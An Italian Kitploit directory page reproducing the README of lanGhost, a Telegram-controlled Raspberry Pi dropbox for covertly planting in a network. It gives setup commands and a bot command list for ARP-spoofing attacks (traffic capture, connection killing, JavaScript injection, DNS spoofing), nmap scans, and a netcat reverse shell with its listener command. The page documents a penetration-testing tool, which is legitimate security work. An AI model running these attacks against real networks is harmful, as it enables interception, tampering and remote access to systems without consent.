Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
lanGhost — 👻 Un chatbot per dropbox LAN controllabile tramite Telegram | Kitploit
Strumenti/GitHubGitHub/xdavidhu/langhost
Strumenti di PhishingRicognizioneMappatura della ReteProxy Web e IntercettazioneRaccolta InformazioniSicurezza di RetePenetration TestingCommand and ControlApprendimento e FormazioneRed TeamingStrumento di Accesso RemotoArchived
352586 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
GitHubxdavidhu/langhost

lanGhost

👻 Un chatbot per dropbox LAN controllabile tramite Telegram

Vedi Repository

⚠️ Attenzione! Questo progetto non è più mantenuto e potrebbe non funzionare come previsto.

Un chatbot dropbox LAN controllabile tramite Telegram

funzionalità:






installazione:

avvertenza:

lanGhost è progettato per Raspberry Pi (Raspbian/Kali per RPi). Eseguirlo su altre distribuzioni desktop potrebbe causare problemi e potrebbe non funzionare come previsto.

Avrai bisogno di un Raspberry Pi con Raspbian/Kali fresco sulla scheda SD, perché non vuoi nient'altro in esecuzione in background.

Avvia il Pi, ottieni una shell SSH o collega un monitor e una tastiera e inserisci questi comandi:

root@kitploit:~
$ sudo apt update && sudo apt install python3 python3-pip
$ git clone https://github.com/xdavidhu/lanGhost
$ cd lanGhost
$ sudo ./setup.py

Per favore leggi le domande/messaggi mentre esegui lo script di configurazione!

passaggio 1/4 - setup.py

root@kitploit:~
[+] Please enter the name of the network interface connected/will
be connected to the target LAN. Default wired interface is 'eth0',
and the default wireless interface is 'wlan0' on most systems, but
you can check it in a different terminal with the 'ifconfig' command.

passaggio 2/4 - setup.py

root@kitploit:~
[+] Please create a Telegram API key by messaging @BotFather on Telegram
with the command '/newbot'.

After this, @BotFather will ask you to choose a name for your bot.
This can be anything you want.

Lastly, @BotFather will ask you for a username for your bot. You have
to choose a unique username here which ends with 'bot'. For
example: xdavidbot. Make note of this username, since later
you will have to search for this to find your bot, which lanGhost
will be running on.

After you send your username of choise to @BotFather, you will recieve
your API key.



passaggio 3/4 - setup.py

root@kitploit:~
[+] Now for lanGhost to only allow access to you, you need to verify yourself.

Send the verification code below TO THE BOT you just created. Just search for your
bot's @username (what you sent to @BotFather) to find it.

[+] Verification code to send: ******

passaggio 4/4 - setup.py

root@kitploit:~
[+] Do you want lanGhost to start on boot? This option is necessary if you are using
this device as a dropbox, because when you are going to drop this device into a
network, you will not have the chanse to start lanGhost remotely! (autostart works
by adding a new cron '@reboot' entry)

Se hai completato la configurazione, riavvia il Pi e lanGhost si avvierà subito!

utilizzo:

avvertenze:

Usare lanGhost su reti più grandi di /24 è sconsigliato perché le scansioni richiederanno troppo tempo.

lanGhost non è silenzioso. Chiunque monitori il traffico può vedere i pacchetti ARP!

inseriscilo in una rete:

Se hai selezionato sì al passaggio 4/4 (avvio automatico), il Pi è completamente configurato per il drop. lanGhost dovrebbe avviarsi all'avvio e inviarti un messaggio su Telegram con il testo: lanGhost started! 👻.

Assicurati di provarlo prima nel tuo laboratorio e verifica che lanGhost risponda ai tuoi messaggi!

Se tutto è pronto, collegalo alla rete di destinazione inserendo il cavo Ethernet nel Pi e collegando l'alimentazione tramite micro USB, e sei pronto per partire!

(lanGhost può funzionare anche via WiFi, ma dovrai configurare wpa_supplicant per connetterti automaticamente alla rete prima)

comandi disponibili:

root@kitploit:~
/scan - Scan LAN network
/scanip [TARGET-IP] - Scan a specific IP address.
/kill [TARGET-IP] - Stop the target's network connection.
/mitm [TARGET-IP] - Capture HTTP/DNS traffic from target.
/replaceimg [TARGET-IP] - Replace HTTP images requested by target.
/injectjs [TARGET-IP] [JS-FILE-URL] - Inject JavaScript into HTTP pages requested by target.
/spoofdns [TARGET-IP] [DOMAIN] [FAKE-IP] - Spoof DNS records for target.
/attacks - View currently running attacks.
/stop [ATTACK-ID] - Stop a currently running attack.
/restart - Restart lanGhost.
/reversesh [TARGET-IP] [PORT] - Create a netcat reverse shell to target.
/help - Display the help menu.
/ping - Pong.

sistema di attacchi:

Puoi iniziare un attacco utilizzando uno di questi comandi: /kill, /mitm, /replaceimg, /injectjs, /spoofdns

Dopo aver avviato uno o più attacchi, puoi usare il comando /attack per ottenere un elenco con gli ATTACK-ID.

Per fermare un attacco digita /stop [ATTACK-ID].

reverse shell:

avvertenza:

/reversesh crea solo una connessione TCP netcat che non è crittografata e tutto il traffico può essere monitorato! Usalo solo per riparazioni di emergenza o per configurare una connessione inversa crittografata se necessario.

Il comando /reversesh serve per ottenere una shell inversa sul Pi, quando non è accessibile dall'esterno.

Per utilizzare il comando /reversesh avrai bisogno di un server in ascolto per la shell.

Comando netcat per avviare il listener sul tuo server:

root@kitploit:~
$ nc -l 0.0.0.0 [PORT]

Comando Telegram:

root@kitploit:~
/reversesh [IP-of-your-listening-server] [PORT]

attacchi:

  • /kill - Interrompe la connettività internet per il target.
  • /mitm - Cattura il traffico HTTP e DNS dal target e lo invia in messaggi di testo.
  • /replaceimg - Sostituisce le immagini HTTP per il target con l'immagine che invii al bot.
  • /injectjs - Inietta JavaScript in ogni risposta HTML HTTP per il target. Devi ospitare il file JS sul tuo server e fornire l'URL come parametro.
  • /spoofdns - Spoofa le risposte DNS per il target.

Tutti gli attacchi usano ARP Spoofing!

scansioni:

  • /scan - Scansiona la rete locale e restituisce gli host online. Usa la scansione nmap -sn per scoprire gli host.
  • /scanip - Scansiona un indirizzo IP per porte aperte e altre informazioni. Usa la scansione nmap -sS.

notifiche:

Riceverai un messaggio ogni volta che un nuovo dispositivo si connette/lascia la rete.

dichiarazione di non responsabilità:

Non sono responsabile di qualsiasi cosa tu faccia con questo programma, quindi per favore usalo solo per scopi buoni ed educativi.

legale:

Copyright (c) 2018 di David Schütz. Alcuni diritti riservati.

lanGhost è sotto i termini della licenza MIT, seguendo tutte le chiarificazioni indicate nel file di licenza. Puoi anche inviarmi un'email all'indirizzo xdavid{at}protonmail{dot}com.

Scarica lo strumento